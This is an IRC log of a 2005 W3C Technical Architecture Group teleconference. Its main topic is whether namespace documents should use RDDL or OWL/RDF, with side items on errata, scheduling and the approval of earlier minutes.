Hello, I made this project and it's working fine, but I have a problem: when the PIR sensor is HIGH, the SMS is sent continuously. Please help me.
I did the same program but it is not working. Is there any error?
There is no error; it's fully tested. You can watch my video tutorial as well.
Add Dynamic Pages
Welcome to the fourth article in the getting started with Prismic and Gatsby tutorial series. We'll be walking through the steps required to convert the content of the site's repeatable pages: /about and /more-info. These pages use the same Slices as the homepage, so we will re-use the same Slice Zone, code components, and Slice fragment queries.
The models for this Page already exist in your Prismic repository. Click on Custom Types, and select the Page type to see the content modeling of the Slice Zone. Then, click the Documents button and choose one Page to view the live version of the page.
The only difference between the Page model and the Homepage model is that we exclude the banner and add a UID field, a URL-friendly unique ID that we will use to determine our pages' URLs.
⚠️ No need to modify the Custom Types
You do not need to change anything in the Custom Types of your repository. However, if you wish to change anything, we highly recommend you wait until the end of this step-by-step tutorial and read the dedicated plugin configuration article.
Run the project with npm start. Open the GraphQL Playground at http://localhost:8000/___graphql, paste the following GraphQL query in the top section, and put the example id value of a document in the Query variables section.
See how we're using the Union type to help us specify the fields we need from a Slice. In this example, we're going to retrieve the Quote Slice in our Custom Type to check that everything is working:
- Query variable
- GraphQL query
{ "id": "f155697f-382a-527c-9af7-d030178be1e4" }
query PageQuery($id: String) { prismicPage(id: {eq: $id}) { data { body { ... on PrismicPageDataBodyQuote { slice_type primary { quote { text } } } } } } }
Run the query by pressing the "play" button ▷ at the top; it'll show you the query results on the right.
There are some important things to note here:
- The Page's Custom Type is repeatable, so we need to query the documents based on the URL visited. That's why we need the $id variable in the query. Read more: Query basics.
- In the GraphiQL explorer, you need to specify the id variable value. This is generated automatically during the site build in your project.
Let's now programmatically create pages from data.
Before creating the page template, delete the ~/src/pages/about.js and ~/src/pages/more-info.js files.
⚠️ Don't skip this step
If you skip this step, you'll end up with errors in the next step.
We will use the File System Route API to generate pages for the Page type. First, create a new file named {PrismicPage.url}.js inside the ~/src/pages folder and paste the following code. This filename uses the nodes from the page query to create dynamic routes using the URLs defined in your Link Resolver.
// {PrismicPage.url}.js file import * as React from 'react' import { graphql } from 'gatsby' import { SliceZone } from '@prismicio/react' import { Layout } from '../components/Layout' import { Seo } from '../components/Seo' import { components } from '../slices' const PageTemplate = ({ data }) => { if (!data) return null const doc = data.prismicPage.data return ( <Layout> <Seo title={doc.document_display_name.text} /> <SliceZone slices={doc.body} components={components} /> </Layout> ) } export const query = graphql` query PageQuery($id: String) { prismicPage(id: { eq: $id }) { data { document_display_name { text } body { ... on PrismicSliceType { slice_type } ...PageDataBodyText ...PageDataBodyQuote ...PageDataBodyFullWidthImage ...PageDataBodyImageGallery ...PageDataBodyImageHighlight } } } } ` export default PageTemplate
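For reference, the Link Resolver those URLs come from might look something like this. It is only a sketch: the route shapes and document type names are assumptions, so adjust them to your own project.

```javascript
// Sketch of a Link Resolver mapping Prismic documents to routes.
// The type names and routes here are assumptions -- yours may differ.
const linkResolver = (doc) => {
  switch (doc.type) {
    case 'page':
      return `/${doc.uid}` // e.g. /about, /more-info
    case 'homepage':
      return '/'
    default:
      return '/'
  }
}

module.exports = { linkResolver }
```

With this resolver, a Page document whose UID is "about" resolves to the /about route that the {PrismicPage.url}.js filename picks up.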
Now, stop the current Gatsby server by pressing Ctrl + C. Relaunch your server by running npm start. When the build is complete, you'll see that the /about and /more-info pages now pull their content entirely from Prismic!
Next up, we will be updating the project to have the ability to control the top navigation from Prismic.
Can't find what you're looking for? Get in touch with us on our Community Forum. | https://prismic.io/docs/technologies/tutorial-4-add-dynamic-pages-gatsby | CC-MAIN-2022-05 | refinedweb | 647 | 65.83 |
I understand the logical steps of asymmetric key cryptography as it relates to TLS, however, I’ve started using Git and in a bid to avoid having to use a password for authentication, I’ve set up ssh keys for passwordless authentication. I understand that these ssh keys are complements of each other but I do not understand how the actual authentication is taking place. I’ve copied the public key to Git and stored the private key locally. As such, I am able to do what I set out to do (passwordless authentication) but I do not know the underlying steps as to why the authentication is successful. I’ve tried searching the web but every answer I’ve found thus far has been too high level in that they did not specify the steps. For example, were I looking for the TLS steps, I’d expect something along the lines of: Check cert of https page (server) – Grab public key and encrypt secret with it – Securely send secret to server which should be the only entity with the corresponding private key to decrypt – Server and client now switch over to encrypted communications using the, now, shared secret.
Tag: steps
Steps to take to ensure Android security? [closed]
I am aware that I should keep android up to date and have an anti virus like MalwareBytes. I also use VPN for connections. What other steps should I take to secure my android phone?
In addition, how can I check which apps are transmitting data?
(I also scan apps using the Play Protect).
If this question has already been answered in detail, could you link to it please?
Is $nHALT$ undecidable even if $M$ halts on input $w$ in finite steps
If we have the language
$ nHALT=\{<M,w,n>;$ $ M$ halts on input $ w$ in less than $ n$ steps$ \}$
Is this language also undecidable in the same way that $ HALT$ is undecidable? And if so, $ nHALT\notin P$ , right?
How to proof that Turing machine that can move right only a limit number of steps is not equal to normal Turing machine
I need to prove that a Turing machine that can move only k steps on the tape after the last latter of the input word is not equal to a normal Turning machine.
My idea is that given a finite input with a finite alphabet the limited machine can write only a finite number of “outputs” on the tape while a normal Turing machine has infinite tape so it can write infinite “outputs” but I have no idea how to make it a formal proof.
any help will be appreciated.
Probabilistic Turing machine – Probability that the head has moved k steps to the right on the work tape
I have a PTM with following transition:
$ \delta(Z_0, \square , 0) = \delta(Z_0, \square , L, R)$ ,
$ \delta(Z_0, \square , 1) = \delta(Z_0, \square , R, R)$
Suppose that this PTM executes n steps. What is the probability that the head has moved k steps to the right on the work tape (in total, i.e., k is the difference between moves to the right and moves to the left) ?
4 Steps to Reach Your Goals Achieve Success FASTER Emotional Speech
4 Steps to Reach Your Goals Achieve Success FASTER Emotional Speech Set goals. Setting goals and putting them in a plan is important for achieving them, as there are some basics to follow when setting goals, including: Clearly define the goal, which is what needs to be achieved, and be measurable, in addition to its realism in order to challenge the person himself, while avoiding setting impossible goals to avoid frustration and failure, and a time limit must be set to achieve them. Setting…
4 Steps to Reach Your Goals Achieve Success FASTER Emotional Speech
Minimum steps to sort array
Consider.
Number of `m` length walks from a vertice with steps in [1, s]
The problem is stated as the following:
We are given a grid graph $ G$ of $ N \times N$ , represented by a series of strings that describe vertices s.t.
- $ L$ is the vertice we’re interested in
- $ P$ are vertices that are unavailable
- $ .$ are vertices that are available
e.g.:
.... ...L ..P. P...
Would mean a graph that looks like this
0 1 2 3 +-------------------+ 0| | | | | | | | | | +-------------------+ 1| | | | | | | | | | +-------------------+ 2| | |XXXX| | | | |XXXX| | +-------------------+ 3|XXXX| | | | |XXXX| | | | +-------------------+
Where $ v_{2,3}$ and $ v_{0,3}$ are unavailable and we’re interested in $ v_{3,1}$ .
From each vertice we’re only allowed to move on the axis (we can’t move on the diagonal) and a move is valid from $ v_{x,y}$ to $ v_{q,p}$ if
- $ |x-q| + |y-p| \leq s$ and $ v_{q,p}$ is available.
- Staying in the same spot is also a valid move
Given $ m$ – maximal number of moves and $ s$ what is the number of ways we can make $ m$ moves from vertice designated by $ L$ .
My attempt was to
- First compute the neighbors reachable from each node. Create a look s.t. $ \forall v N[v]$ is the list of reachable nodes from $ v$
- Then build a starting record $ M_0$ s.t. if node is reachable $ M[i][j] = 1$ and $ 0$ otherwise.
- Then for each step calculate for $ \forall i,j \in N$ (all the grid) $ M_{i}[i][j] = \sum_{v\in N[v]} M_{i-1}[v_i][v_j]$ (where $ v_i, v_j$ are the coordinates of $ v$ on the grid) and store in a matrix $ M_i$
We iterate until $ i==m$ .
- for each $ v_{i,j}$ : 1. for each neighbor $ n$ of $ v_{i,j}$ : 1. $ M[i][j] += M'[n_i][n_j]$
Unfortunately this doesn’t work (tried to do it with a pen and paper as well to make sure) and I get fewer results then the expected answer, apparently there should be
385 ways but I only get to
187.
Here are the intermediate states for the above mentioned board:
---------------------------- 5 6 5 5 5 7 6 6 4 6 0 5 0 5 4 5 ---------------------------- 25 34 27 27 27 41 33 34 20 33 0 27 0 27 20 25 ---------------------------- 133 187 146 149 146 229 182 187 105 182 0 146 0 146 105 133 ----------------------------
This did work for e.g. m=2 and s=1 for the following board:
0 1 2 +---+---+---+ 0| | | | | | | | +-----------+ 1| | | | | | | | +-----------+ 2| | | | | | | | +---+---+---+
Here’s my reference code (
findWalks is the main function)
using namespace std; using Cord = std::pair<size_t, size_t>; auto hash_pair = [](const Cord& c) { return std::hash<size_t>{}(c.first) ^ (std::hash<size_t>{}(c.second) << 1); }; using NeighborsMap = unordered_map<Cord, vector<Cord>, decltype(hash_pair)>; inline vector<vector<int>> initBoard(size_t n) { return vector<vector<int>>(n, vector<int>(n, 0)); } Cord findPOI(vector<string>& board) { for (size_t i=0; i < board.size(); i++) { for (size_t j=0; j < board.size(); j++) { if (board[i][j] == 'L') { return make_pair(i, j); } } } return make_pair(-1, -1); } NeighborsMap BuildNeighbors(const vector<string>& board, size_t s) { NeighborsMap neighbors(board.size() * board.size(), hash_pair); for (size_t i = 0; i < board.size(); i++) { for (size_t j = 0; j < board.size(); j++) { size_t min_i = i > s ? i - s : 0; size_t max_i = i + s > board.size() - 1 ? board.size() - 1 : i + s; size_t min_j = j > s ? j - s : 0; size_t max_j = j + s > board.size() - 1 ? board.size() - 1 : j + s; auto key = make_pair(i, j); if (board[i][j] != 'P') { for (size_t x = min_i; x <= max_i; x++) { if (board[x][j] != 'P' && x != i) { neighbors[key].push_back(make_pair(x, j)); } } for (size_t y = min_j; y <= max_j; y++) { if (board[i][y] != 'P' && y != j) { neighbors[key].push_back(make_pair(i, y)); } } neighbors[key].push_back(key); } else { neighbors[key].clear(); } } } return neighbors; } int GetNeighboursWalks(const Cord& cord, NeighborsMap& neighbors, const vector<vector<int>>& prevBoard) { int sum{ 0 }; const auto& currentNeighbors = neighbors[cord]; for (const auto& neighbor : currentNeighbors) { sum += prevBoard[neighbor.first][neighbor.second]; } return sum; } int findWalks(int m, int s, vector<string> board) { vector<vector<int>> currentBoard = initBoard(board.size()); vector<vector<int>> prevBoard = initBoard(board.size()); std::unordered_map<int, std::vector<Cord>> progress; auto poi = findPOI(board); NeighborsMap neighbors = BuildNeighbors(board, s); for (const auto& item : neighbors) { 
const auto& key = item.first; const auto& value = item.second; prevBoard[key.first][key.second] = value.size(); } for (size_t k = 1; k <= static_cast<size_t>(m); k++) { for (size_t i = 0; i < board.size(); i++) { for (size_t j = 0; j < board.size(); j++) { auto currentKey = make_pair(i, j); currentBoard[i][j] = board[i][j] != 'P' ? GetNeighboursWalks(currentKey, neighbors, prevBoard) : 0; } } std::swap(currentBoard, prevBoard); } return prevBoard[poi.first][poi.second]; }
CFG to CNF, but stuck on the last few steps
I recently learned about the conversion, but I seem to be stuck.
I need to convert the following CFG to CNF:
$ S → XY$
$ X → abb|aXb|e$
$ Y → c|cY$
- There is no S on the right side, so I did not need to add another
- I removed the null productions $ X → e$
$ S→XY|Y$
$ X→abb|aXb|ab|$
$ Y→c|cY|$
I removed unit production $ S→Y$ $ Y→c$ with $ S→c$
There are no production rules which have more than 2 variables
Here, I struggle. I am not allowed to have a terminal symbol and a variable together, but I am not sure how to get rid of these.
New grammar after step 4:
$ S→XY|c$
$ X→abb|aXb|ab$
$ Y→ZY$
$ Z→c$
I managed to replace the symbol c with Z, and added the new rule, so that seems fixed. However, I am unsure what do do with $ aXb$ .
Is this okay so far? if yes, what step should i take next?
Thank you in advance!
Setting different steps for Y-Axes of ListPlot
I am trying to set the scaling interval of my Y-Axes different than Mathematica automatically does. So in steps of 1000 instead of 2000 (see picture)
At the moment I determined following PlotRange:
PlotRange -> {{1, 10}, {0, 8000}}
Is there a simple option?
To get an overview over the command:
ListPlot [ MapThread[ If[Or[#1[[1]] === 3., #1[[1]] === 8.], Callout[Tooltip[#1, #2], #2], Tooltip[#1, #2]] &, Annotated2], FrameLabel -> {"Happiness Score", "Education Expenditure (per capita)"}, Frame -> True, GridLines -> Automatic, LabelStyle -> {GrayLevel[0]}, PlotRange -> {{1, 10}, {0, 8000}}] // Framed | https://proxieslive.com/tag/steps/ | CC-MAIN-2020-29 | refinedweb | 1,711 | 67.99 |
Technical Support
On-Line Manuals
CARM User's Guide
Discontinued
#include <string.h>
int strncmp (
const unsigned char *string1, /* first string */
const unsigned char *string2, /* second string */
unsigned int len); /* max characters to compare */
The strncmp function compares the first len bytes of string1 and string2 and returns a value indicating their
relationship.
The strncmp function returns the following values to
indicate the relationship of the first len bytes
of string1 to string2:
memcmp, strcmp
#include <string.h>
#include <stdio.h> /* for printf */
void tst_strncmp (void) {
unsigned char str1 [] = "Wrodanahan T.J.";
unsigned char str2 [] = "Wrodanaugh J.W.";
char i;
i = strncmp (str1, str2, 15);
if (i < 0)
printf ("str1 < str2\n");
else if (i > 0)
printf ("str1 > str2\n");
else
printf ("str1 == str. | http://www.keil.com/support/man/docs/ca/ca_strncmp.htm | CC-MAIN-2020-16 | refinedweb | 124 | 71.75 |
I created this script to help with some geodatabase house cleaning tasks. Maybe someone else will find it useful or have an idea to improve it.
import arcpy import os # Set workspace myGDB = r"C:\temp\working.gdb" # Get domains that are assigned to a field domains_used = [] for dirpath, dirnames, filenames in arcpy.da.Walk(myGDB, datatype=["FeatureClass", "Table"]): for filename in filenames: print "Checking {}".format(os.path.join(dirpath, filename)) try: ## Check for normal field domains for field in arcpy.ListFields(os.path.join(dirpath, filename)): if field.domain: domains_used.append(field.domain) ## Check for domains used in a subtype field subtypes = arcpy.da.ListSubtypes(os.path.join(dirpath, filename)) for stcode, stdict in subtypes.iteritems(): if stdict["SubtypeField"] != u'': for field, fieldvals in stdict["FieldValues"].iteritems(): if not fieldvals[1] is None: domains_used.append(fieldvals[1].name) except Exception, err: print "Error:", err # Get domains that exist in the geodatabase domains_existing = [dom.name for dom in arcpy.da.ListDomains(myGDB)] # Find existing domains that are not assigned to a field domains_unused = set(domains_existing) ^ set(domains_used) print "{} unused domains in {}".format(len(domains_unused), myGDB) for domain in domains_unused: arcpy.DeleteDomain_management(myGDB, domain) print "{} deleted".format(domain)
Hi Blake,
Thanks for the great script. A colleague recommended it to perform some long awaited maintenance on our SDE instances and this will be very handy.
While running it, however, the script through the following exception:
Is there a way to execute this code when the connection being used isn't the owner? Perhaps a way to skip over the domains that don't belong to the current owner.
Thanks again,
Ruch | https://community.esri.com/thread/160265?commentID=543911 | CC-MAIN-2019-09 | refinedweb | 270 | 52.87 |
The QPen class defines how a QPainter should draw lines and outlines of shapes. More...
#include <QPen>
The QPen class defines how a QPainter should draw lines and outlines of shapes.
A pen has a style, width, brush, cap style and join style.
The pen style defines the line type. The default pen style is Qt::SolidLine. Setting the style to Qt::NoPen tells the painter to not draw lines or outlines.
The pen brush defines the fill of lines and text. The default pen is a solid black brush. The QColor documentation lists predefined colors.
The cap style defines how the end points of lines are drawn. The join style defines how the joins between two lines are drawn when multiple connected lines are drawn (QPainter::drawPolyline() etc.). The cap and join styles only apply to wide lines, i.e. when the width is 1 or greater.
Use the QBrush class to specify fill styles.
Example:
QPainter painter; QPen pen(Qt::red, 2); // red solid line, 2 pixels wide painter.begin(&anyPaintDevice); // paint something painter.setPen(pen); // set the red, wide pen painter.drawRect(40,30, 200,100); // draw a rectangle painter.setPen(Qt::blue); // set blue pen, 0 pixel width painter.drawLine(40,30, 240,130); // draw a diagonal in rectangle painter.end(); // painting done
See the Qt::PenStyle enum type for a complete list of pen styles.
Whether or not end points are drawn when the pen width is zero or one depends on the cap style. Using SquareCap (the default) or RoundCap they are drawn, using FlatCap they are not drawn.
A pen's color(), brush(), width(), style(), capStyle() and joinStyle() can be set in the constructor or later with setColor(), setWidth(), setStyle(), setCapStyle() and setJoinStyle(). Pens may also be compared and streamed.
See also QPainter and QPainter::setPen().
Constructs a default black solid line pen with 0 width.
Constructs a black pen with 0 width and style style.
See also setStyle().
Constructs a pen of color color with 0 width.
See also setBrush() and setColor().
Constructs a pen with the specified brush brush and width width. The pen style is set to s, the pen cap style to c and the pen join style to j.
See also setWidth(), setStyle(), and setBrush().
Constructs a pen that is a copy of p.
Destroys the pen.
Returns the brush used to fill strokes generated with this pen.
See also setBrush().
Returns the pen's cap style.
See also setCapStyle().
Returns the pen color.
See also setColor().
Returns true if the pen has a solid fill
Returns the pen's join style.
See also setJoinStyle().
Sets the brush used to fill strokes generated with this pen to the given brush.
See also brush().
Sets the pen's cap style to c.
The default value is Qt::SquareCap.
See also capStyle().
Sets the pen color to c.
See also color().
Sets the pen's join style to j.
The default value is Qt::BevelJoin.
See also joinStyle().
Sets the pen style to s.
See the Qt::PenStyle documentation for a list of all the styles.
See also style().
Sets the pen width to width
A line width of zero indicates cosmetic pen. This means that the pen width is always drawn one pixel wide, independent of the transformation set on the painter.
Setting a pen width with a negative value is not supported.
See also setWidthF() and width().
Sets the pen width to width.
See also setWidth() and widthF().
Returns the pen style.
See also setStyle().
Returns the pen width with integer preceision.
See also setWidth().
Returns the pen width with floating point precision.
See also setWidthF() and width().
Returns the pen as a QVariant
Returns true if the pen is different from p; otherwise returns false.
Two pens are different if they have different styles, widths or colors.
See also operator==().
Assigns p to this pen and returns a reference to this pen.
Returns true if the pen is equal to p; otherwise returns false.
Two pens are equal if they have equal styles, widths and colors.
See also operator!=().
This is an overloaded member function, provided for convenience. It behaves essentially like the above function.
Reads a pen from the stream s into p and returns a reference to the stream.
See also Format of the QDataStream operators. | http://doc.trolltech.com/4.0/qpen.html | crawl-001 | refinedweb | 721 | 79.67 |
IRC log of tagmem on 2005-04-26
Timestamps are in UTC.
16:59:15 [RRSAgent]
RRSAgent has joined #tagmem
16:59:15 [RRSAgent]
logging to
16:59:21 [noah]
noah has joined #tagmem
16:59:52 [noah]
zakim, who is here?
16:59:52 [Zakim]
On the phone I see TimBL, ??P11
16:59:55 [Zakim]
On IRC I see noah, RRSAgent, Ed, Zakim, Vincent, Norm, ht, DanC
17:00:22 [Zakim]
+[IBMCambridge]
17:00:29 [noah]
zakim, [IBMCambridge] is me
17:00:29 [Zakim]
+noah; got it
17:00:34 [Zakim]
+[INRIA]
17:00:52 [Zakim]
+norm
17:01:09 [Vincent]
Zakim, INRIA is Vincent
17:01:09 [Zakim]
+Vincent; got it
17:01:30 [noah]
Topic: Tag teleconference of 26-April-2005
17:01:35 [noah]
scribe: Noah Mendelsohn
17:01:39 [noah]
scribenick: noah
17:01:49 [Zakim]
+Roy_Fielding
17:01:54 [noah]
Meeting: Tag teleconference of 26-April-2005
17:02:08 [Vincent]
Zakim, who is here
17:02:08 [Zakim]
Vincent, you need to end that query with '?'
17:02:18 [Vincent]
Zakim, who is here?
17:02:18 [Zakim]
On the phone I see TimBL, ??P11, noah, Vincent, norm, Roy_Fielding
17:02:19 [Roy]
Roy has joined #tagmem
17:02:19 [Zakim]
On IRC I see noah, RRSAgent, Ed, Zakim, Vincent, Norm, ht, DanC
17:02:29 [noah]
Chair: Vincent Quint
17:03:08 [noah]
Agenda:
17:04:11 [Zakim]
-Roy_Fielding
17:04:43 [Zakim]
+Roy_Fielding
17:05:03 [noah]
Topic: Attendance
17:05:08 [timbl]
timbl has joined #tagmem
17:05:43 [noah]
Regrets: David Orchard, Dan Connolly (seems to be on IRC)
17:05:49 [noah]
Missing for now: Henry Thompson
17:06:12 [ht]
zakim, please call ht-781
17:06:12 [Zakim]
ok, ht; the call is being made
17:06:14 [Zakim]
+Ht
17:06:37 [noah]
Present: Roy Fielding, Vincent Quint, Tim Berners-Lee, Noah Mendelsohn, Norm Walsh, Ed Rice
17:06:42 [noah]
Topic: Future Regrets
17:06:56 [noah]
May 10th: Norm and Tim will be unavailable
17:07:01 [noah]
May 17th: Tim at risk
17:07:21 [noah]
May 3rd: no regrets for now
17:07:24 [timbl]
I note May 10th is the WWW conference in Chiba Japan
17:07:42 [noah]
s/Future Regrets/Future Meetings/
17:08:06 [noah]
For next week, scribes will be: David Orchard if available, otherwise Norm Walsh
17:08:15 [noah]
Topic: Approval of previous minutes
17:08:44 [noah]
Review of:
17:08:54 [noah]
Norm: haven't reviewed but no problem if others agree.
17:09:21 [noah]
RESOLUTION: Minutes of April 19th accepted
17:09:33 [noah]
Henry reports that he has been on phone for past 5 minutes
17:09:55 [noah]
Topic: TAG Publications and "Heartbeats"
17:10:35 [noah]
Norm sent a note (member only) on errata:
17:10:39 [noah]
VQ: do we have errata?
17:10:56 [noah]
NW: yes, 3 or 4 reported to comments list, all editorial
17:11:17 [noah]
ACTION: Norm to gather errata list for consideration next week.
17:12:12 [noah]
NW: The RDDL to-do may be mine. It had history with Tim Bray, then Paul Cotton, both now gone.
17:12:31 [noah]
NW: I've somewhat lost track of where it stands, but I'll take the lead if we figure out what we want to do.
17:13:07 [noah]
NW: The AC asked the TAG to produce a rec-track document, presumably based on RDDL.
17:13:12 [noah]
VQ: Do we have a draft?
17:13:13 [noah]
NW: No.
17:13:48 [noah]
NW: I'm willing to produce if asked to do so, either based on RDDL 1.0 or something else. What do we want to do.
17:13:49 [ht]
Would prefer 1.0
17:13:57 [noah]
s/do./do?/
17:14:36 [noah]
NW: ht has pointed out use of RDDL 1.0 in some W3C specs. Microsoft is also deploying?
17:14:51 [noah]
TBL: Are you saying TAG should produce a Rec?
17:14:56 [noah]
NW: AC asked us to.
17:15:23 [noah]
TBL: GRDDL affects this, no?
17:15:32 [noah]
HT: Solves a different problem.
17:15:36 [noah]
TBL: Why?
17:16:08 [noah]
HT: RDDL solves the question of what you should do specifically with namespaces. GRDDL is about: "I've got a doc that serves two purposes: (1) to be an XML document and (2) to say how to harvest metadata"
17:16:38 [noah]
TBL: GRDDL allows you to extract (RDF?) information from something that is not in RDF form.
17:17:05 [noah]
NW: One of the objections to earlier Namespace formats was that they were not in RDF and should have been. GRDDL takes the heat off of that.
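The extraction being described can be sketched in miniature. This toy (with an invented vocabulary — real GRDDL names an XSLT transform from inside the document itself) turns "colloquial" XML that is not RDF into RDF-style triples:

```python
# Toy sketch of the idea behind GRDDL: start from colloquial XML that is
# not RDF, and harvest (subject, predicate, object) statements from it.
# The element names and namespace below are invented for illustration.
import xml.etree.ElementTree as ET

COLLOQUIAL_XML = """\
<contact xmlns="http://example.org/ns/contact" id="http://example.org/people/alice">
  <name>Alice</name>
  <mbox>mailto:alice@example.org</mbox>
</contact>"""

NS = "{http://example.org/ns/contact}"

def harvest_triples(xml_text):
    """Extract (subject, predicate, object) triples from the toy vocabulary."""
    root = ET.fromstring(xml_text)
    subject = root.get("id")
    triples = []
    for child in root:
        local = child.tag[len(NS):]  # strip the ElementTree namespace wrapper
        predicate = "http://example.org/ns/contact#" + local
        triples.append((subject, predicate, child.text))
    return triples

for t in harvest_triples(COLLOQUIAL_XML):
    print(t)
```

The point of the mechanism is exactly what NW notes: the authored document need not be RDF, yet RDF can still be derived from it.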
17:17:17 [noah]
HT: Some of the problems we're solving don't need all the RDF mechanism.
17:17:30 [noah]
TBL: Yes, but for the many namespaces built for RDF it makes great sense.
17:17:50 [noah]
TBL: For a semantic web language, then OWL should be the language of the namespace document.
17:18:04 [noah]
HT: Historically, we decided early that there was no single thing you wanted to say about a namespace.
17:18:23 [noah]
HT: Among the many such things is what the RDF schema is, what the XML Schema is for the serialization.
17:19:04 [noah]
TBL: I understand. I think you need to divide the cases. XML Schema makes no sense for RDF vocabularies.
17:19:40 [noah]
HT: But with GRDDL it does make sense. It gives me license to author in colloquial XML a document that is known to contain RDF statements.
17:19:49 [noah]
HT: For such a document, all of that makes sense.
17:20:04 [Norm]
Norm has joined #tagmem
17:20:13 [noah]
TBL: That makes sense, except that when I extract the RDF information I would not expect the extracted doc to be in the same namespace.
17:20:14 [Norm]
zakim, mute me
17:20:14 [Zakim]
norm should now be muted
17:20:17 [noah]
HT: OK, makes sense.
17:20:45 [Norm]
zakim, who's here?
17:20:45 [Zakim]
On the phone I see TimBL, ??P11, noah, Vincent, norm (muted), Roy_Fielding, Ht
17:20:47 [Zakim]
On IRC I see Norm, timbl, Roy, noah, RRSAgent, Ed, Zakim, Vincent, ht, DanC
17:20:57 [noah]
HT: Still, my point is that the original RDDL was based on the presumption that there would be more than one document of interest, and that it would contain pointers to one or more things as necessary.
17:21:13 [noah]
TBL: Well, only if we say that this is only for non-semantic web namespaces.
17:21:33 [Norm]
zakim, unmute me
17:21:33 [Zakim]
norm should no longer be muted
17:21:44 [noah]
HT: I'm less convinced than you that the differences matter, but I can easily live with a statement that at least for now, the RDDL approach is aimed at non-semantic web namespaces.
17:21:52 [Norm]
zakim, who's talking?
17:21:55 [Roy]
Roy has joined #tagmem
17:21:59 [noah]
HT: Information please: does OWL say use it as a namespaces doc?
17:22:03 [Zakim]
Norm, listening for 10 seconds I heard sound from the following: TimBL (71%), ??P11 (43%), Vincent (19%)
17:22:21 [timbl]
q?
17:22:26 [Roy]
q+
17:22:27 [noah]
TBL: No, but the TAG did some sort of best practices note (can't find right now) says do that, and I think it's common practice.
17:23:01 [noah]
HT: OK, so finding might say: if (isSemanticWeb) then {use owl} else {use RDDL}
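HT's one-line sketch, spelled out as code. How to decide "is semantic web" is exactly what is under debate here, so the classification test below is a hypothetical stand-in for whatever criterion the finding would actually specify:

```python
# Sketch of the proposed finding's dispatch rule: choose the namespace-document
# format based on whether the namespace names a semantic-web vocabulary.
# The membership set is a stand-in; the real test is an open question.
SEMANTIC_WEB_NAMESPACES = {
    "http://www.w3.org/1999/02/22-rdf-syntax-ns#",
    "http://www.w3.org/2002/07/owl#",
}

def namespace_document_format(namespace_uri):
    """Return the format the finding would recommend for the namespace document."""
    if namespace_uri in SEMANTIC_WEB_NAMESPACES:
        return "OWL"   # describe the vocabulary in RDF/OWL itself
    return "RDDL"      # human-readable page carrying related-resource links

print(namespace_document_format("http://www.w3.org/2002/07/owl#"))  # OWL
print(namespace_document_format("http://www.w3.org/1999/xhtml"))    # RDDL
```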
17:23:27 [noah]
NW: I'm not convinced that using RDDL for all is bad, with the RDDL pointing to the OWL. I want human readable documentation, etc.
17:23:47 [noah]
NW: I'm thinking of Ed Dumbill's work on software project descriptions. It's both RDF and not.
17:23:59 [ht]
DOAP
17:24:03 [noah]
NW: I don't totally disagree with Tim, but I'm not totally convinced either.
17:24:10 [noah]
TBL: what's he really done?
17:24:12 [Roy]
pointer to RDDL in minutes?
17:24:17 [ht]
17:24:31 [noah]
NW: A constrained RDF that's usable as XML.
17:24:32 [ht]
17:24:38 [noah]
TBL: right, that's the tricky case
17:25:40 [noah]
TBL: specifically because there's an issue of whether the fragid identifies the concept or the markup
17:25:50 [noah]
HT: argh, not httpRange-14!
17:26:17 [noah]
NRM: No, smaller than httpRange-14. We need to ask what's the media type in this case, and what answer is given to Tim's question about fragids.
17:26:19 [Roy]
17:26:21 [Vincent]
ack Roy
17:27:14 [ht]
q+ ht
17:27:20 [noah]
RF: We've been around this before. Key question is: what's the requirement for the document? I think we had consensus on one thing, which is that the key requirement is that it be human readable.
17:27:28 [Norm]
Roy is right, we did come to consensus on that point
17:27:33 [noah]
TBL: I'm not sure we said that. For some cases, machine readiable is important.
17:27:42 [noah]
s/readiable/readable/
17:28:07 [timbl]
I don't think we had a consensus that human readable was primary. Tim Bray said so strongly. I am prepared to defend strongly the semantic web use of OWL and RDF in general.
17:28:18 [noah]
RF: I mostly don't want to go around same ground again. Ideally, it's useful for human purposes and machine readable as necessary.
17:29:25 [noah]
TBL: We have a current suite of specs that tell a semantic web agent how to go out and find semantic web information. This would require a new spec and engineering into future software. Is this a good thing to require for agents?
17:29:35 [Vincent]
ack ht
17:29:38 [noah]
TBL: In fact, you can use a stylesheet to make an owl doc human readable
17:29:50 [noah]
HT: We did this for W3C XML schema
17:30:07 [Norm]
If the cost of the redirect is too expensive, then the cost of the retrieval is probably too expensive too.
17:30:19 [noah]
HT: The rec was written to allow you to implement indirection through things like namespace documents. Most implementations do the right thing when a RDDL doc comes back.
17:30:45 [noah]
HT: This is a relevant precedent. It was easy and lightweight. About 10 lines of code in the validators I built.
17:31:11 [noah]
TBL: Most of this software has no XML processing software, except for limited purposes.
17:31:23 [noah]
RF: They're not extensible for new media types.
17:31:34 [Roy]
s/./?/
17:31:36 [noah]
TBL: There's no XML schema processing in the RDF processors.
17:32:17 [Roy]
q?
17:32:23 [noah]
HT: You've misunderstood. I'm only drawing a parallel. I'm pointing out that the fact that it was easy to add to XML schema processors suggests it will be equally easy to add such indirection to RDF processors.
17:33:08 [noah]
TBL: Adding something simple to an existing system to something that's currently simple and complete results in a kind of complication.
17:34:07 [noah]
q+ to ask how sem. web namespaces are the same and different from others
17:34:58 [noah]
TBL: e.g., using different DTD syntax for XML complicated everything
17:35:45 [noah]
TBL: Even using the XML stuff for RDF was a complication, but it would be good to hold the line there. OWL is in RDF, so we can get into that world quite quickly and cleanly.
17:35:56 [Norm]
Norm has joined #tagmem
17:36:12 [Vincent]
ack noah
17:36:12 [Zakim]
noah, you wanted to ask how sem. web namespaces are the same and different from others
17:36:12 [Roy]
q+ to ask if there are any examples of such an OWL namespace description to look at
17:39:03 [Norm]
q?
17:39:29 [Vincent]
ack Roy
17:39:29 [Zakim]
Roy, you wanted to ask if there are any examples of such an OWL namespace description to look at
17:39:35 [ht]
I always thought it was the XSL WG's requirement that produced Namespaces. . .
17:40:07 [noah]
NRM: Tim tells us that sem. web. is a clean closed consistent world, but some of the complication comes from the fact that it shares a namespace mechanism with a wider XML world.
17:40:18 [ht]
DanC, are you happy with the XRI response?
17:40:25 [Norm]
17:40:26 [Norm]
17:40:40 [noah]
NRM: This allows a nice "pun", in which the serialization of an RDF namespace is the corresponding (same) XML namespace. We also can reference XML datatypes.
17:40:57 [DanC]
I think so, ht. the one I reviewed and commented on was pretty close, and I assume the subsequent edits remain in that neighborhood
17:41:35 [noah]
NRM: This will pop up on one side or the other: if we want the sem web side to be clean and consistent, then the story about namespaces as a whole gets more complicated. If we have a uniform story about all namespaces (e.g. RDDL), then the sem. web side gets a bit more complicated. Take your choice.
17:41:53 [noah]
